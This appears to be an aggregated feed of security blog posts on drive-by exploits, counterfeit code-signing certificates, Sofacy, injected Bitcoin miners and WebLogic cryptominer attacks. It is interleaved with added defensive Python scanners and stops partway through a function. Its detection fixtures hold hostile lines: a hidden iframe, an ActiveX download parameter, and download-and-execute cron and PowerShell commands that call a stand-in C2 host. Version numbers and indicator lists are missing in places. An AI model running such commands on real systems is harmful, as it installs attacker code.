Drive-by download campaign targets Chinese websites, experiments with exploits

During our web crawls we sometimes come across bizarre findings or patterns we haven’t seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.

For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.

The campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser’s address bar shows gusto-delivery[.]com, there are several injected layers that expose visitors to unwanted code and malware.

For instance, we find a reference to a Coinhive clone:

var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {
 threads: navigator.hardwareConcurrency,
 autoThreads: false,
 throttle: 0.2,
 forceASMJS: false
});

We are unsure whether this is a pure ripoff of Coinhive (the website template is almost identical), but the two differ on one point: the Chinese version (hosted at ppoi[.]org) takes only a 10 percent commission, compared with 30 percent for Coinhive.


I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this
rate is fixed, regardless of actual blocks found and the luck involved finding them. 
We keep 10% for us to operate this service and to (hopefully) turn a profit.

Finally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:

In addition to a late-added copy of the aforementioned VBScript, similar to the ones found on other Chinese websites, we notice three exploits targeting older vulnerabilities: one in an ActiveX component, one in Flash Player and one in Internet Explorer.


This old CVE is a vulnerability in the C6 Messenger ActiveX control. The threat actor reused the code already published here and simply altered the DownloadUrl parameter to point to their malicious binary. Users (unless their browser settings have been tightened) are presented with a prompt asking them to install this piece of malware.


This is a Flash Player vulnerability affecting Flash up to version, again lifted from a public proof of concept. Its implementation in this particular drive-by is somewhat unstable, though, and may crash the browser.


Finally, a more interesting CVE: the well-known Internet Explorer “God Mode” vulnerability, although for some unexplained reason the code was commented out.

The final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.


Although we see the use of several exploits, we cannot call this an exploit kit, not even an amateur one: the domain serving the exploits appears to be static and the URIs are always the same.

Regardless, nothing prevents threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, such attacks may still compromise legacy systems or machines that have not been patched.
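To make the injection layers above concrete, here is an added example, written for this page rather than taken from the Malwarebytes post: a small Python scanner that flags the three layers in fetched page source, namely a hidden or zero-size iframe, an object tag instantiating an ActiveX control with a DownloadUrl parameter, and the instantiation of a Coinhive-style miner. The HTML it scans is constructed; the domains, the classid and the miner key are made up and do not correspond to the real campaign.

```python
import re
from html.parser import HTMLParser

# Constructed page source, not captured from the campaign: a hidden iframe,
# an ActiveX <object> whose DownloadUrl parameter points at an executable,
# and a Coinhive-style miner stanza. Domains, classid and key are made up.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="http://exploit.example/ie/index.htm" width="0" height="0"></iframe>
<object classid="clsid:00000000-1111-2222-3333-444444444444" id="dl">
  <param name="DownloadUrl" value="http://exploit.example/files/setup.exe">
</object>
<script src="https://miner.example/lib/miner.min.js"></script>
<script>
var miner = new ProjectPoi.User('ABCDEFGHIJKLMNOPQRSTUVWX', 'john-doe', {
  threads: navigator.hardwareConcurrency, throttle: 0.2 });
</script>
</body></html>
"""

# Coinhive's constructor and the clone's share the "new Vendor.Class(" shape.
MINER_CTOR = re.compile(r"new\s+(CoinHive|ProjectPoi)\.(\w+)\s*\(")


class InjectionScanner(HTMLParser):
    """Collect (kind, detail) findings for the three injection layers."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_object = False   # inside an <object> element
        self._script = None       # buffer for inline <script> text, else None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            # Zero-size or display:none frames are the classic drive-by overlay.
            style = a.get("style", "").replace(" ", "").lower()
            if a.get("width") == "0" or a.get("height") == "0" or "display:none" in style:
                self.findings.append(("hidden_iframe", a.get("src")))
        elif tag == "object":
            self._in_object = True
        elif tag == "param" and self._in_object:
            # Download-and-install ActiveX controls take the binary URL as a param.
            if a.get("name", "").lower() == "downloadurl":
                self.findings.append(("activex_download", a.get("value")))
        elif tag == "script" and "src" not in a:
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "object":
            self._in_object = False
        elif tag == "script" and self._script is not None:
            m = MINER_CTOR.search("".join(self._script))
            if m:
                self.findings.append(("browser_miner", f"{m.group(1)}.{m.group(2)}"))
            self._script = None


def scan(html):
    """Return the list of findings for one page's source."""
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_HTML):
        print(f"{kind:17} {detail}")
```

The scanner only sees what is present in the source it is given; since the iframe and miner stanza in a chain like this one are typically injected by an earlier script layer, run it on the rendered DOM of a crawled page rather than on the raw server response, otherwise it will catch only the statically injected layer.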

Indicators of compromise

Malicious redirection


Exploit domain and IP







The post Drive-by download campaign targets Chinese websites, experiments with exploits appeared first on Malwarebytes Labs.

Author: Jérôme Segura

The Use of Counterfeit Code Signing Certificates Is on the Rise

Insikt Group


Key Judgements

  • We observed the earliest use of stolen code certificates in 2011, but it was not until 2015 that code signing certificates became widely available in the criminal underground.
  • Insikt Group identified four well-known vendors of such products since 2011; only two vendors are currently soliciting their services to Russian-speaking hackers.
  • The most affordable version of a code signing certificate costs $299, but the most comprehensive Extended Validation (EV) certificate with a SmartScreen reputation rating is listed for $1,599. The starting price of a domain name registration with EV SSL certificate is $349.
  • All certificates are issued by reputable companies, such as Comodo, Thawte, and Symantec, and have proved to be extremely effective in malware obfuscation. We believe that legitimate business owners are unaware that their data was used in the illicit activities.
  • Network security appliances performing deep packet inspection become less effective when legitimate (legitimate certificate) SSL/TLS traffic is initiated by a malicious implant. Netflow (packet headers) analysis is an important control toward reducing risk, as host-based controls may also be rendered ineffective by legitimate code signing certificates.

Executive Summary

In 2017, security researchers around the world started seeing a sudden increase in code signing certificates being used as a layered obfuscation technique for malicious payload distribution campaigns. Recorded Future’s Insikt Group investigated the criminal underground and identified vendors currently offering both code signing certificates and domain name registration with accompanying SSL certificates.

Contrary to a common belief that the security certificates circulating in the criminal underground are stolen from legitimate owners prior to being used in nefarious campaigns, we confirmed with a high degree of certainty that the certificates are created for a specific buyer per request only and are registered using stolen corporate identities, making traditional network security appliances less effective.


For a number of years, security researchers have warned the public about cybercriminals using counterfeit code signing certificates to obfuscate malicious payloads, but only a handful of times have these underground services been researched thoroughly.

As antivirus detection improved, standard tactics such as payload encryption were no longer sufficient. It became harder to keep a file undetected for extended periods, sometimes requiring daily “cleaning” of executable files. As a result, cybercriminals needed a more comprehensive approach and began experimenting with a second layer of protection: signing payload files with legitimately issued code signing certificates.

Although it was known that threat actors were using counterfeit certificates as early as 2011, it was not until 2015 that the first offerings surfaced in the underground.

Threat Analysis

One of the first vendors to offer counterfeit code signing certificates was known as C@T, a member of a prolific hacking messaging board. In March 2015, C@T offered for sale a Microsoft Authenticode certificate capable of signing 32- and 64-bit versions of various executable files, as well as Microsoft Office, Microsoft VBA, Netscape Object Signing and Marimba Channel Signing documents, with support for Silverlight 4 applications. Apple code signing certificates were also available.

In his advertisement, C@T explained that the certificates are registered under legitimate corporations and issued by Comodo, Thawte, and Symantec, the largest and most respected issuers. The seller indicated that each certificate is unique and will only be assigned to a single buyer, which he said could easily be verified. According to C@T, the success rate of payload installations from signed files increases by 30 to 50 percent, and he admitted to selling over 60 certificates in less than six months.

During that time, C@T saw sales dwindle and failed to appeal to a broad client base because of prohibitive costs, in some cases demanding upwards of $1,000 per certificate, when other more affordable and reliable payload obfuscation methods were still available.

Timeline of Criminal Activity Involving Counterfeit Code Signing Certificates

The activity of criminal vendors of counterfeit code signing certificates in the dark web.

Approximately two years later, three new actors began offering their services, primarily in the Eastern European underground. While one actor eventually moved on to other illicit operations, the remaining two still actively supply counterfeit certificates to Russian-speaking actors.

The second actor specializes in Class 3 certificates, which do not include Extended Validation (EV) assurance and are available for the price of $600, whereas the third actor offers the broadest range of products.

Standard code signing certificates issued by Comodo that do not include SmartScreen reputation rating cost $295. A buyer interested in the most trusted version of an EV certificate issued by Symantec would have to pay $1,599, a 230 percent premium compared to the price of the authentic certificate. For those seeking to purchase in bulk, fully authenticated domains with EV SSL encryption and code signing capabilities could also be arranged for $1,799.

Product List

Product listing advertised by a threat actor.

According to the information provided by both sellers during a private conversation, to guarantee the issuance and lifespan of the products, all certificates are registered using the information of real corporations. With a high degree of confidence, we believe that the legitimate business owners are unaware that their data was used in the illicit activities. It is important to note that all certificates are created for each buyer individually with the average delivery time of two to four days.

Technical Analysis

Both actors have acknowledged that, because of the advanced security measures in the Chrome browser, which is considered to provide excellent protection, clients must expect significantly lower success rates against Chrome than against Firefox, Internet Explorer and Safari.

Insikt Group successfully convinced a vendor to conduct a trial, signing a provided payload executable of a previously unreported Remote Access Trojan (RAT) with a recently issued Comodo certificate. Although the test files had been encrypted beforehand, the results demonstrated the superior effectiveness of the code-signed versions.

While eight antivirus products detected the encrypted version of the payload, only two of them detected the code-signed version. Results were worse for a non-resident version of the payload: only six products detected the encrypted version, and only Endgame's protection recognized the signed file as malicious.


Network security appliances performing deep packet inspection become less effective when legitimate (legitimate certificate) SSL/TLS traffic is initiated by a malicious implant. Netflow (packet headers) analysis is an important control toward reducing risk, as host-based controls may also be rendered ineffective by legitimate code signing certificates.
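As an added illustration of that flow-level control (example code written for this page, not from the Recorded Future report), the following Python looks for beaconing in NetFlow-style records: when a validly signed implant speaks TLS to a server with a valid certificate, neither the file nor the payload gives a signature hit, but the regularity of its connections remains observable in flow metadata. The records are constructed, with addresses from documentation ranges.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed NetFlow-style records: (epoch seconds, src, dst, dst_port, bytes).
# 10.0.0.5 beacons to 203.0.113.7:443 roughly every 60 s with near-constant
# size; 10.0.0.9 browses 198.51.100.20:443 at irregular times and sizes.
FLOWS = [
    (1000, "10.0.0.5", "203.0.113.7", 443, 1200),
    (1061, "10.0.0.5", "203.0.113.7", 443, 1180),
    (1119, "10.0.0.5", "203.0.113.7", 443, 1210),
    (1180, "10.0.0.5", "203.0.113.7", 443, 1195),
    (1241, "10.0.0.5", "203.0.113.7", 443, 1205),
    (1299, "10.0.0.5", "203.0.113.7", 443, 1190),
    (1003, "10.0.0.9", "198.51.100.20", 443, 54000),
    (1010, "10.0.0.9", "198.51.100.20", 443, 2200),
    (1090, "10.0.0.9", "198.51.100.20", 443, 91000),
    (1400, "10.0.0.9", "198.51.100.20", 443, 7000),
    (1404, "10.0.0.9", "198.51.100.20", 443, 6500),
    (1950, "10.0.0.9", "198.51.100.20", 443, 300),
]


def beacon_candidates(flows, min_flows=5, max_gap_cv=0.15, max_size_cv=0.2):
    """Return [(src, dst, port, mean_gap_seconds), ...] for talker pairs whose
    inter-flow gaps and flow sizes are both regular (low coefficient of
    variation). Cadence is what survives when payload and certificate both
    look legitimate."""
    by_pair = defaultdict(list)
    for ts, src, dst, port, nbytes in flows:
        by_pair[(src, dst, port)].append((ts, nbytes))

    hits = []
    for pair, recs in by_pair.items():
        if len(recs) < min_flows:
            continue
        recs.sort()
        gaps = [b[0] - a[0] for a, b in zip(recs, recs[1:])]
        sizes = [n for _, n in recs]
        if mean(gaps) == 0:
            continue                      # duplicate timestamps, not a cadence
        gap_cv = pstdev(gaps) / mean(gaps)
        size_cv = pstdev(sizes) / mean(sizes)
        if gap_cv <= max_gap_cv and size_cv <= max_size_cv:
            hits.append((*pair, round(mean(gaps), 1)))
    return hits


if __name__ == "__main__":
    for src, dst, port, interval in beacon_candidates(FLOWS):
        print(f"{src} -> {dst}:{port} every ~{interval}s")
```

The thresholds are deliberately loose; real implants add jitter, so a production version would bin by hour and use a longer window, but the principle (regularity of timing and size per talker pair, independent of certificate validity) is the same.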

Unlike ordinary crypting services, readily available at $10 to $30 per encryption, we do not anticipate counterfeit certificates becoming a mainstream staple of cybercrime, because of their prohibitive cost. However, more sophisticated actors and nation-state actors engaged in narrower, more targeted attacks will undoubtedly continue using fake code signing and SSL certificates in their operations.


The post The Use of Counterfeit Code Signing Certificates Is on the Rise appeared first on Recorded Future.

Author: Andrei Barysevich

Sofacy APT turns to the East

We at Kaspersky Lab monitor, report, and protect against a lot of threat actors, some of which are known internationally and sometimes featured in the news. It doesn’t matter which language the threat actor speaks, it’s our duty to know about it, investigate it, and protect our customers from it.

One of the most active threat actors is a Russian-speaking APT called Sofacy, also known as APT28, Fancy Bear, and Tsar Team, infamous for its spear phishing campaigns and cyberespionage activities. In 2017, it shifted focus in a way worthy of an update here.

We’ve been watching Sofacy since 2011 and are pretty familiar with the instruments and tactics the threat actor is using. Last year, the main change was that it moved beyond the NATO countries it was actively spear phishing in the beginning of the year and onto countries in the Middle East and Asia — and farther — in Q2 2017. Earlier, Sofacy also targeted the Olympic Games, the World Anti-Doping Agency (WADA), and the Court of Arbitration for Sports (CAS).

Sofacy uses different tools for different target profiles. For example, in early 2017 a campaign called Dealer’s Choice targeted mostly military and diplomatic organizations (mainly in NATO countries and Ukraine); later, the hackers were using two other tools, which we call Zebrocy and SPLM, to target companies of different profiles including science and engineering centers and press services. Both Zebrocy and SPLM were heavily modified last year, with SPLM (which also goes by the name Chopsticks) becoming modular and using encrypted communications.

The usual infection scheme starts with a spear-phishing letter containing a file with a script that downloads the payload. Sofacy is known for finding and exploiting zero-day vulnerabilities and using those exploits to deliver the payload. The threat actor maintains a high level of operational security and really focuses on making its malware harder to detect — which, of course, makes it harder to investigate.

In cases of highly sophisticated targeted campaigns such as Sofacy, thorough incident investigation is vital. It will allow you to figure out what information malefactors were after, understand their motives, and detect the presence of any sleeping implants.

To do that, your security system needs not only advanced protective solutions but also an endpoint detection and response system. Such a system detects threats at early stages, and helps analyze events that predated the incident. Having skilled experts doesn’t hurt, either. As a solution, we offer the Threat Management and Defense platform, which incorporates Kaspersky Anti Targeted Attack, Kaspersky Endpoint Detection and Response, and expert services.

You can find more information on the threat actor’s activity in 2017, including technical details, on Securelist. Further, at the start of this year, our researchers found some interesting shifts in Sofacy’s behavior that we will highlight at the SAS 2018 conference. If you are interested in APTs and building defense against them, don’t forget to get a ticket — or at least visit our blogs frequently during the SAS.

Author: John Snow

Security Alert: Attackers Using Script Injection to Spread Bitcoin-Mining Malware

Security researchers recently analyzed various spam campaigns and discovered a new one related to Bitcoin cryptocurrency that is impacting a lot of websites.

In recent months, Bitcoin has received a lot of attention and reached high price levels, followed by various fluctuations. Mining consists of verifying other Bitcoin transactions, for which miners are rewarded, and is meant to keep transactions safe and secure.

How the infection is spread

During this spam campaign, online criminals try to inject a malicious script into legitimate websites running WordPress, Joomla and JBoss. The script is hidden in the compromised site and exists to push a binary file to visitors; that binary then abuses the victim's CPU to mine Bitcoin for the attackers.

Basically, when visitors access a website hosting the malicious script and run the binary it pushes, their PC's CPU is used to mine Bitcoin for the attackers. The binary also collects information from any Bitcoin wallet installed on the compromised machine.

Here is how the malicious script is injected, with a reference to the following site (sanitized for your own protection):

http://online-game-18[.]xyz/?c=41-149-20180219062557833d27348&pst=2&key=[uniktID]

The package offered to potential victims looks like an adult game named “The #1 Adult Game – Free to Play” and contains an executable named “setup_sex_game.exe”.

The binary is digitally signed with a certificate issued by Comodo, with the following details:

Status Valid
Issuer COMODO RSA Code Signing CA
Valid from 1:00 AM 2/15/2018 to 12:59 AM 2/16/2019
Valid Use Code Signing
Algorithm sha256RSA
Thumbprint 9FB7FD71BB7DA9C256E872CB56E3808E811990BB
Serial number 66 CA 14 17 72 9E 0A BB D8 F9 80 08 A3 97 4B B4

The above domain is hosted on the server 212.224.118[.]40 (sanitized for your own protection). Security researchers discovered that the same server is linked with other Bitcoin-mining domains, including ones pushing the same free-game offer. Here is the list of malicious domains:

action8 [.] xyz
biggame1 [.] xyz
updflash [.] xyz
Best-game [.] xyz
game18plus [.] xyz
need action [.] xyz
Win32 flash [.] xyz
update-flash [.] xyz
Update Flash Player [.] xyz

Heimdal Security proactively blocked all infected sites, so all Heimdal PRO and Heimdal CORP users are protected.

According to VirusTotal, only 16 antivirus engines out of 68 managed to detect the binary package file at the time we write this article.
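The certificate details listed above live inside the binary's Authenticode signature. As an added example (not code from the Heimdal post or from CSIS), the following Python locates that signature using only the standard library: it reads the security data directory from the PE optional header and walks the WIN_CERTIFICATE entries, returning the PKCS#7 blob, which can then be inspected with openssl pkcs7 -inform DER -print_certs -text to read the issuer, serial and validity and to compute the thumbprint. The skeletal PE it parses is constructed inside the script and its certificate payload is a placeholder, not a real signature.

```python
import struct

SECURITY_DIR_INDEX = 4                 # IMAGE_DIRECTORY_ENTRY_SECURITY
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002
WIN_CERT_REVISION_2_0 = 0x0200


def build_sample_pe(cert_blob):
    """Construct a skeletal PE32+ image whose security directory points at one
    WIN_CERTIFICATE wrapping cert_blob. Constructed for this example only;
    it has no sections and is not loadable."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    opt = bytearray(112 + 16 * 8)                      # PE32+ fixed part + 16 directories
    struct.pack_into("<H", opt, 0, 0x20B)              # Magic: PE32+
    struct.pack_into("<I", opt, 108, 16)               # NumberOfRvaAndSizes
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, len(opt), 0x22)
    headers_end = e_lfanew + 4 + len(coff) + len(opt)
    cert_offset = (headers_end + 7) & ~7               # certificate table is 8-byte aligned
    entry = struct.pack("<IHH", 8 + len(cert_blob), WIN_CERT_REVISION_2_0,
                        WIN_CERT_TYPE_PKCS_SIGNED_DATA) + cert_blob
    entry = entry.ljust((len(entry) + 7) & ~7, b"\x00")
    # Security directory: VirtualAddress is a raw file offset, not an RVA.
    struct.pack_into("<II", opt, 112 + SECURITY_DIR_INDEX * 8, cert_offset, len(entry))
    image = dos + b"PE\x00\x00" + coff + bytes(opt)
    return image.ljust(cert_offset, b"\x00") + entry


def authenticode_certificates(data):
    """Return [(revision, cert_type, blob), ...] for each WIN_CERTIFICATE entry
    referenced by the PE security directory; empty list if unsigned."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    opt_off = e_lfanew + 4 + 20                        # skip signature and COFF header
    magic = struct.unpack_from("<H", data, opt_off)[0]
    # (offset of NumberOfRvaAndSizes, offset of data directories) per format
    layout = {0x10B: (92, 96), 0x20B: (108, 112)}.get(magic)
    if layout is None:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    nrva_off, dirs_off = layout
    if struct.unpack_from("<I", data, opt_off + nrva_off)[0] <= SECURITY_DIR_INDEX:
        return []
    sec_off, sec_size = struct.unpack_from("<II", data, opt_off + dirs_off + SECURITY_DIR_INDEX * 8)
    if sec_size == 0:
        return []
    certs, pos, end = [], sec_off, sec_off + sec_size
    while pos + 8 <= end:
        length, revision, cert_type = struct.unpack_from("<IHH", data, pos)
        if length < 8 or pos + length > end:
            raise ValueError("malformed WIN_CERTIFICATE entry")
        certs.append((revision, cert_type, bytes(data[pos + 8:pos + length])))
        pos += (length + 7) & ~7                       # entries are 8-byte aligned
    return certs


if __name__ == "__main__":
    sample = build_sample_pe(b"\x30\x82\x00\x00PLACEHOLDER-PKCS7")
    for revision, cert_type, blob in authenticode_certificates(sample):
        print(f"revision={revision:#06x} type={cert_type:#06x} pkcs7_bytes={len(blob)}")
        # Write blob to sig.der, then:
        #   openssl pkcs7 -inform DER -in sig.der -print_certs -text
```

Two cautions a practitioner will recognise: the presence of a PKCS#7 blob says nothing about whether the signature verifies or whether the signer should be trusted, and the certificate table is excluded from the Authenticode hash, so a blob can be appended to or swapped in an existing binary without disturbing the rest of the file. The thumbprint and serial, once extracted, are what to compare against indicator lists like the one above.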


How to protect yourself against malicious script injections

The main issue with this Bitcoin-mining malware is that it behaves like fileless malware and usually goes undetected by traditional antivirus products. By injecting a malicious script, attackers can redirect users to a compromised site and steal sensitive data. This is why we strongly recommend that users:

  • Apply all available updates for your apps (especially the most targeted ones: Flash, Java and browsers), software and operating system. Do not postpone patching; keeping the OS up to date is the best thing users can do for their safety.
  • Be very careful when clicking on suspicious links or websites, and always check that the web page's URL is genuine.
  • Prefer sites that use HTTPS (a valid security certificate) to reduce the risk of malware infection.
  • Install a reliable antivirus program on your computer to protect your data from online threats.
  • Consider adding multiple layers of protection, and also use a proactive cyber security solution.
  • Probably one of the best security measures anyone can take is learning to recognize the various online threats. We recommend reading these free educational resources to gain more knowledge of the cybersecurity industry.

*This article features cyber intelligence provided by CSIS Security Group researchers.

Author: Ioana Rijnetu

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability in the WebLogic Server Security Service (WLS Security) of Oracle WebLogic Server versions and prior, which attackers can exploit to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof-of-concept code in December 2017. Attackers leveraged this vulnerability to download cryptocurrency miners into victim environments. The recent cryptocurrency boom has resulted in a growing number of operations, employing diverse tactics, aimed at stealing cryptocurrency. The perception that these mining operations are less risky, along with the potentially handsome profits, could lead cyber criminals to shift away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some of the tactics we've observed involve exploiting CVE-2017-10271 and leveraging PowerShell to download the miner directly onto the victim's system (Figure 1), then executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server onto the vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task named “Update service for Oracle”. In Figure 5, a different variant deletes this task and other similar ones after creating its own, “Update service for Oracle productsa”. From this it is quite clear that different attackers are fighting over the resources available on the system.

  • Killing processes matching certain strings associated with other miners

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similarly to the scheduled task deletion, certain known mining processes are also terminated (Figures 6 and 7).

  • Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Other observed flags are: -a for the algorithm, -k for keepalive (to prevent timeouts), -o for the URL of the mining server, -u for the wallet key, -p for the mining server password, and -t to limit the number of miner threads.

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers limit the CPU usage of the miner (Figure 9).
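Added example for the flag set just described (written for this page, not code from the FireEye post): a parser that pulls the pool URL, wallet, thread count and CPU limit out of process command lines so they can be turned into indicators or fed to a detection rule. The command lines are constructed, with made-up pool hosts and wallets; the flag spellings follow the xmrig-style short and long options as I understand them and are an assumption, so extend FLAG_MAP for the miner family actually seen.

```python
import re
import shlex

# Constructed process command lines (paths, pool hosts and wallets are made up).
SAMPLE_CMDLINES = [
    r"C:\Windows\Temp\cranberry.exe -a cryptonight -k -o stratum+tcp://pool.example:3333 "
    r"-u 44examplewallet1 -p x -t 2 --max-cpu-usage=40",
    r"C:\Java\jre\bin\java.exe -Xmx2g -cp weblogic.jar weblogic.Server",
    r"/tmp/xmrig --url=stratum+tcp://pool2.example:5555 --user=48examplewallet2 "
    r"--pass=x --threads=4 --keepalive --max-cpu-usage 75",
]

# Short/long spellings of the flags discussed above (xmrig-style; assumed).
FLAG_MAP = {
    "-a": "algo", "--algo": "algo",
    "-o": "pool", "--url": "pool",
    "-u": "wallet", "--user": "wallet",
    "-p": "password", "--pass": "password",
    "-t": "threads", "--threads": "threads",
    "--max-cpu-usage": "max_cpu",
}
BOOL_FLAGS = {"-k": "keepalive", "--keepalive": "keepalive"}
STRATUM = re.compile(r"^stratum\+(tcp|ssl)://", re.I)


def tokenize(cmdline):
    """Split on whitespace, honouring quotes but keeping Windows backslashes."""
    lex = shlex.shlex(cmdline, posix=False)
    lex.whitespace_split = True
    lex.commenters = ""          # '#' is not a comment marker in a command line
    return list(lex)


def parse_miner_cmdline(cmdline):
    """Return a dict of miner settings found in cmdline, or None when it carries
    neither a pool URL nor a wallet and so does not look like a miner."""
    argv = tokenize(cmdline)
    found = {"exe": argv[0]}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in BOOL_FLAGS:
            found[BOOL_FLAGS[tok]] = True
            i += 1
            continue
        name, sep, inline = tok.partition("=")      # "--flag=value" or "--flag value"
        if name in FLAG_MAP:
            value = inline if sep else (argv[i + 1] if i + 1 < len(argv) else "")
            found[FLAG_MAP[name]] = value
            i += 1 if sep else 2
            continue
        i += 1
    if "pool" not in found and "wallet" not in found:
        return None
    found["stratum"] = bool(STRATUM.match(found.get("pool", "")))
    return found


def miner_iocs(cmdlines):
    """Collect the unique pools and wallets across many command lines."""
    pools, wallets = set(), set()
    for c in cmdlines:
        hit = parse_miner_cmdline(c)
        if hit:
            pools.add(hit.get("pool"))
            wallets.add(hit.get("wallet"))
    pools.discard(None)
    wallets.discard(None)
    return sorted(pools), sorted(wallets)


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(parse_miner_cmdline(c))
    print(miner_iocs(SAMPLE_CMDLINES))
```

On a live host the input would come from `Get-CimInstance Win32_Process` (the CommandLine property) or `ps -eo args` on Linux; the stratum scheme and the wallet are the strongest indicators, since a pool hostname changes more readily than the payout address.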

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim's environment using dumped Windows credentials and the EternalBlue vulnerability.

The malware checks whether it is running on a 32-bit or 64-bit system to determine which PowerShell script to fetch from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with the extracted credentials, and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM hashes obtained via Mimikatz in order to download and execute the malware on remote systems.

Additionally, the malware exfiltrates stolen credentials to the
attacker via an HTTP GET request to:

If lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to determine whether that host is vulnerable to EternalBlue, and if so uses the exploit to spread to it.

After all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) with functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU

Figure 14: Terminating other potential miners

The function shown in Figure 14 finds processes with high CPU usage and terminates them. This kills other potential miners and maximizes the resources available to the attacker's own miner.
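The scheduled-task and cron persistence described under Tactic #2 and Tactic #4 can be hunted the same way on both platforms. The following added example (written for this page, not code from the FireEye post) flags scheduled tasks whose action contains a download cradle, runs from a temp directory, or borrows a vendor name the way the “Update service for Oracle” tasks do, and cron entries that fetch-and-pipe into a shell or download into /tmp and execute. The schtasks CSV and crontab lines are constructed; hostnames and paths are made up, and only the task names echo those in the post.

```python
import csv
import io
import re

# Constructed `schtasks /query /fo CSV /v` output, trimmed to three columns.
# Task names imitate the ones in the post; commands and hosts are made up.
SCHTASKS_CSV = r'''TaskName,Task To Run,Run As User
\Update service for Oracle products,"powershell -nop -w hidden -c ""IEX (New-Object Net.WebClient).DownloadString('http://c2.example/info6.ps1')""",SYSTEM
\Microsoft\Windows\Defrag\ScheduledDefrag,%windir%\system32\defrag.exe -c -h -o -$,SYSTEM
\Update service for Oracle,C:\Windows\Temp\cranberry.exe -o stratum+tcp://pool.example:3333,SYSTEM
'''

# Constructed root crontab from a Linux host.
CRONTAB = r'''
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://c2.example/lower.css | sh
*/5 * * * * wget -q -O /tmp/.x http://c2.example/xmrig && chmod +x /tmp/.x && /tmp/.x
'''

DOWNLOAD_CRADLE = re.compile(r"\b(DownloadString|DownloadFile|Invoke-WebRequest|IEX|curl|wget)\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash)\b")
TEMP_PATH = re.compile(r"(\\Temp\\|\\AppData\\Local\\Temp\\|/tmp/|/dev/shm/)", re.I)
VENDOR_LURE = re.compile(r"\b(oracle|java|adobe|flash)\b", re.I)
VENDOR_DIR = re.compile(r"\\(Oracle|Java|Adobe)\\", re.I)   # where a real vendor task would live


def suspicious_tasks(schtasks_csv):
    """Return [(task_name, [reasons]), ...] for tasks whose action downloads
    code, runs from a temp path, or uses a vendor name without a vendor binary."""
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        name, action = row["TaskName"], row["Task To Run"]
        reasons = []
        if DOWNLOAD_CRADLE.search(action):
            reasons.append("download cradle")
        if TEMP_PATH.search(action):
            reasons.append("runs from temp path")
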